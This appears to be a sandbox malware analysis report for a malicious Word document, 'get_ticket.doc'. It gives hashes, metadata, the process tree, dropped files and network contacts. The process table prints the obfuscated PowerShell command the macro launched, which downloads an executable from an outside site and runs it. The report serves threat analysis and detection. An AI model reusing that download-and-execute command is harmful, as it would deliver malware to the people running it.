File name: | get_ticket.doc |
Full analysis: | https://app.any.run/tasks/fdd0c097-b220-47bd-bdcb-feef9bc6a614 |
Verdict: | Malicious activity |
Analysis date: | November 14, 2018, 22:34:35 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
File info: | Microsoft Word 2007+ |
MD5: | B3D4C845E0A3F99B75CEE70EAC11D30D |
SHA1: | 3616337E617B0322C6002B271C221AB9E6778AAF |
SHA256: | 243538303C9FFE849B598516CA549F97D4929DA0D3F56BBF4E8CD4AD4E170B52 |
SSDEEP: | 1536:C5u80+qY1nlJU3S/oLe36EGj6t7z+gEE6LS9dIOJ/uC:Cw80hYtdoq3Txg+9f/uC |
.docm | | | Word Microsoft Office Open XML Format document (with Macro) (53.6) |
---|---|---|
.docx | | | Word Microsoft Office Open XML Format document (24.2) |
.zip | | | Open Packaging Conventions container (18) |
.zip | | | ZIP compressed archive (4.1) |
AppVersion: | 16 |
---|---|
HyperlinksChanged: | No |
SharedDoc: | No |
CharactersWithSpaces: | - |
LinksUpToDate: | No |
Company: | home |
TitlesOfParts: | - |
HeadingPairs: |
|
ScaleCrop: | No |
Paragraphs: | - |
Lines: | 1 |
DocSecurity: | None |
Application: | Microsoft Office Word |
Characters: | - |
Words: | - |
Pages: | 1 |
TotalEditTime: | - |
Template: | Normal.dotm |
ModifyDate: | 2018:11:14 14:36:00Z |
CreateDate: | 2018:11:14 14:36:00Z |
RevisionNumber: | 2 |
LastModifiedBy: | admin |
Keywords: | - |
Creator: | - |
---|---|
Subject: | - |
Title: | - |
ZipFileName: | [Content_Types].xml |
---|---|
ZipUncompressedSize: | 1503 |
ZipCompressedSize: | 399 |
ZipCRC: | 0x3f450766 |
ZipModifyDate: | 1980:01:01 00:00:00 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0006 |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2784 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\get_ticket.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3688 | powershell $path = 'caUnT4:\winaUnT4dows\teaUnT4mp\p.eaUnT4xe' -replace 'aUnT4', '';iex('$wc = new-obaUnT4ject neaUnT4t.webaUnT4client; $wc.dowaUnT4nloaUnT4adfilaUnT4e(\"haUnT4taUnT4taUnT4ps://www.aultlegal.com/HP_fix_it8712.exe\", $path)' -replace 'aUnT4', '');iex('staaUnT4rt-proaUnT4cesaUnT4s $path' -replace 'aUnT4', ''); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WINWORD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3288 | "C:\windows\temp\p.exe" | C:\windows\temp\p.exe | powershell.exe | |
User: admin Company: Morgan Stanley Protect Integrity Level: MEDIUM Description: Lifeschool Version: 15.6.64.34 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2784 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9805.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3688 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\POGIXZY0EZKOBZNNLZBJ.temp | — | |
MD5:— | SHA256:— | |||
2784 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:3579E0DBDB57BAA016FB59E928A34E05 | SHA256:E2412788B389440144B7CCBDD0C8BAE85D9DA88D9BB0E6C4BB7D9394D34745A4 | |||
3688 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\E02357FC7708441D4B0BE5F371F4B28961870F70 | binary | |
MD5:DA6C793FB0533AF0139A6D76C9956547 | SHA256:BCEC4BFFD8EE03E0FDF1C1577EF4635AC08DB1F94CF07B0C406A6B3A171E9E1D | |||
3688 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 | |||
3688 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5da4b7.TMP | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 | |||
3688 | powershell.exe | C:\windows\temp\p.exe | executable | |
MD5:EA0C4DCAB1D5BA62B00B58B8DFEECD8A | SHA256:B38D476008AAFF41EFFBBEDB6022EA59369A55754369B981340CD63DF6B8FCB5 | |||
2784 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:BEFEA26C8A4DCFEA564F9EFCEC5865C3 | SHA256:551EF632D788BA0FCDF95710A48389315FAA34AA7E3EA2025359AA97F0F7FB4D | |||
2784 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$t_ticket.doc | pgc | |
MD5:A6A4B6625A67829CB98EFF822BED42B4 | SHA256:030DF7141B6F51FA1A46715F43AD1E5E69399FCAB657D3055871A84DCF323D72 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3688 | powershell.exe | 67.227.172.56:443 | www.aultlegal.com | Liquid Web, L.L.C | US | unknown |
Domain | IP | Reputation |
---|---|---|
www.aultlegal.com |
| unknown |
Process | Message |
---|---|
p.exe | MP3 file corrupted |